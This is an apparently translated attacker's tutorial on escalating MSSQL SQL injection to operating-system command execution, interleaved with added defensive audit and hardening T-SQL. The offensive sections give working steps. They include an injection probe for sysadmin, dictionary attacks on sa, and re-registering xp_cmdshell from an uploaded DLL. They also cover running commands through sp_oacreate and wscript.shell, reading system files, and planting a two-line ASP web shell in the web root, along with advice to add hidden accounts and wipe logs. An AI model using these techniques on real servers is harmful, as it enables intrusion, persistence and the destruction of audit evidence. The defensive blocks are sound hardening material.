Marching toward xp_cmdshell: obtaining administrative rights with MSSQL extended stored procedures

In MSSQL, a user with sysadmin privileges can execute arbitrary system commands with system-level permissions through the xp_cmdshell extended stored procedure. Most security-conscious administrators therefore delete it, and even where it has not been deleted the attempt often comes to nothing because the current user lacks the required permissions. Obtaining the right to execute xp_cmdshell has thus become the ultimate goal of most SQL injection attacks. Below I describe several key problems that come up along the way and how they are solved. Let's begin.

Getting the current user's permissions

MSSQL has eight fixed server roles in total: sysadmin, dbcreator, diskadmin, processadmin, serveradmin, setupadmin, securityadmin and bulkadmin. Each role plays a different part, and which one we hold decides our success or failure. Of the eight, only membership of sysadmin is what we really want, so we only need to submit

    http://somesite/show.asp?id=4864 and 1=(select IS_SRVROLEMEMBER('sysadmin'))

to determine whether the current user has sysadmin permissions. If the page returns normally, congratulations: today's lottery ticket is a sure winner! Otherwise (who is throwing eggs at me? ^_^) we have other methods we can use.

Cracking a weak sa password

This method does not strictly belong to the category of SQL injection, but it often plays a decisive role in the whole penetration process. Without further ado, open SQLScanPass, the tool I use most often, and write the host IP and port 1433 into SQLHost.txt. First try a blank password; if that fails, attach a good dictionary, which greatly increases the probability of success. The running interface is shown in the figure. Now we can brew a cup of coffee and wait slowly.
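Seen from the DBA's side, the role check and the sa guessing above point at two things to audit: which logins sit in the eight fixed server roles (and whether the web site's login is one of them), and whether sa is still enabled with a password that can be guessed over the network. The following T-SQL is an added example, not code from the original article; it assumes SQL Server 2005 or later, and [webapp] and [YourAppDb] are placeholder names for the site's login and database.

```sql
-- Added audit and least-privilege example (not from the original article).
-- Assumes SQL Server 2005 or later. [webapp] and [YourAppDb] are placeholders.

-- 1. Does the login the web site connects as hold sysadmin? Run this as that login.
--    IS_SRVROLEMEMBER returns 1 (member), 0 (not a member) or NULL (bad role/login).
SELECT SUSER_SNAME() AS current_login,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 2. List every member of the eight fixed server roles, so an application login
--    or an unexpected account in sysadmin stands out immediately.
SELECT r.name AS server_role, m.name AS member_login, m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name IN ('sysadmin', 'dbcreator', 'diskadmin', 'processadmin',
                 'serveradmin', 'setupadmin', 'securityadmin', 'bulkadmin')
ORDER BY r.name, m.name;

-- 3. Least privilege for the site: a dedicated login mapped to a database user
--    with only the rights the application needs and nothing at server level,
--    so an injected IS_SRVROLEMEMBER('sysadmin') probe simply returns 0.
USE master;
CREATE LOGIN [webapp] WITH PASSWORD = N'<strong-generated-password>', CHECK_POLICY = ON;
USE [YourAppDb];
CREATE USER [webapp] FOR LOGIN [webapp];
ALTER ROLE db_datareader ADD MEMBER [webapp];   -- 2012+; sp_addrolemember on older versions
-- Grant specific write rights instead of db_datawriter where the app needs them:
-- GRANT INSERT, UPDATE ON dbo.Orders TO [webapp];

-- 4. Disable sa so a weak or dictionary-guessable sa password cannot be used from
--    the network at all (renaming it as well is common practice).
USE master;
ALTER LOGIN sa DISABLE;
```

Step 2 is the query to schedule and diff over time: a new row in sysadmin that nobody can account for is the first sign that something like the rest of this article has happened. Repeated "Login failed for user 'sa'" entries in the SQL Server error log are the other side of the password-scanning step, and they only help if that log is forwarded off the host before anyone gets to "clean up the MSSQL log".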
Detecting the extended stored procedures

If the user the site connects as is a member of sysadmin, we can use the laziest method to detect and restore the extended stored procedures, which makes things a lot easier. Likewise, once we have obtained a weak password for sa or another account, the rest of the work can be handed over to SQLTools.exe. This program was written by Blue Glow and is unimaginably powerful. But executing database commands with it requires support from certain extended stored procedures, so the first step is to determine whether they exist. From the "Use directory" menu open the "execute database command" window and fill in the command we want to run, for example

    select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'

to determine whether the xp_cmdshell extended stored procedure exists; the running interface is shown in the figure. If the result is 1, we can use the "Execute DOS command" menu option. Otherwise, read on.

Restoring xp_cmdshell and taking the box

Directly in the database command window, enter

    Exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'; select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'

If it returns 1, the restore succeeded; otherwise we need to upload an xplog70.dll to the server. Open the file upload window, upload the file to C:\WinNt\System32\, and then execute the database command

    Exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'C:\WinNt\System32\xplog70.dll'

OK, the rest is the net use and net localgroup commands we use every day, plus adding a hidden account and cleaning up the IIS and MSSQL logs.

Bypassing xp_cmdshell to execute system commands

In MSSQL you can create ActiveX script objects through the two extended stored procedures sp_oacreate and sp_oamethod.
So the statement to execute a system command can be written as:

    declare @o int
    exec sp_oacreate 'wscript.shell', @o out
    exec sp_oamethod @o, 'run', NULL, 'net start telnet'

Its effect is to execute net start telnet on the server through wscript.shell, which starts the Telnet service. You will think of the FSO! Yes, we can also use it for file management, for example:

    declare @o int, @f int, @t int, @ret int, @c varchar(8000)
    declare @line varchar(8000)
    exec sp_oacreate 'scripting.filesystemobject', @o out
    exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
    exec @ret = sp_oamethod @f, 'readline', @line out
    select @c=''
    while( @ret = 0)
    begin
        select @c=@c+@line+char(13)+char(10)
        exec @ret = sp_oamethod @f, 'readline', @line out
    end

This reads the contents of c:\boot.ini and stores them in the local variable @c. If you want to read it out, you need to create a temporary table and write it there. With the same method you can also create and write files, for example:

    declare @o int, @f int, @t int, @ret int
    exec sp_oacreate 'scripting.filesystemobject', @o out
    exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
    exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run("cmd.exe /c "&request.querystring("cmd")) %>'

This creates in c:\inetpub\wwwroot\foo.asp an ASP Trojan of only two lines of code. This method avoids both the large amount of junk produced by the backup method and the trouble of creating temporary tables when using the sp_makewebtask extended stored procedure. An essential tool for home and travel alike, and a killer for the hard disk.

Summary

MSSQL provides us with an unusually rich library of extended stored procedures that can accomplish most of the important functions the operating system itself can: registry management, file management, user management, permission management and so on. But without sufficient security awareness, this brings a deadly threat. Even I am a little afraid, thinking about it:
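Both halves of the technique described above, re-registering xp_cmdshell from a DLL and reaching the operating system through sp_oacreate / sp_oamethod, correspond to things a DBA can inspect and switch off at the instance level. The following T-SQL is an added hardening and detection example, not code from the original article or from SQLTools; it assumes SQL Server 2005 or later, where both surfaces are sp_configure options (on SQL Server 2000, which this article targets, the only remedy was sp_dropextendedproc plus removing the DLL, and that is exactly what the restore step above works around), and [webapp] is a placeholder login name.

```sql
-- Added hardening and detection example (not from the original article).
-- Assumes SQL Server 2005 or later, run as a sysadmin. [webapp] is a placeholder.

-- 1. Which extended stored procedures are registered, and from which DLL?
--    xp_cmdshell normally loads from xplog70.dll in the instance's Binn directory.
--    The same name registered from C:\WinNt\System32 or a web root is the
--    re-registration described above and should be treated as an incident.
SELECT name, dll_name
FROM sys.extended_procedures
ORDER BY name;

-- 2. Current state of the two surfaces the article relies on (1 = enabled).
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures');

-- 3. Turn both off. 'show advanced options' must be on to change them.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Verify: both rows should now show value_in_use = 0.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures');

-- 5. Make the denial explicit for the application's user in master, so that a
--    later GRANT (or a sysadmin-level re-enable) shows up in permission audits.
USE master;
CREATE USER [webapp] FOR LOGIN [webapp];
DENY EXECUTE ON dbo.xp_cmdshell TO [webapp];
DENY EXECUTE ON dbo.sp_OACreate TO [webapp];
DENY EXECUTE ON dbo.sp_OAMethod TO [webapp];
```

Steps 1 and 2 are worth running on a schedule and alerting on any change: a flipped configuration value or a new dll_name is a far earlier signal than a foo.asp appearing in the web root. Note that sp_configure settings and the DENY rows above are all reversible by any sysadmin login, which is why the earlier point about keeping the web application's login out of sysadmin is the control that actually matters.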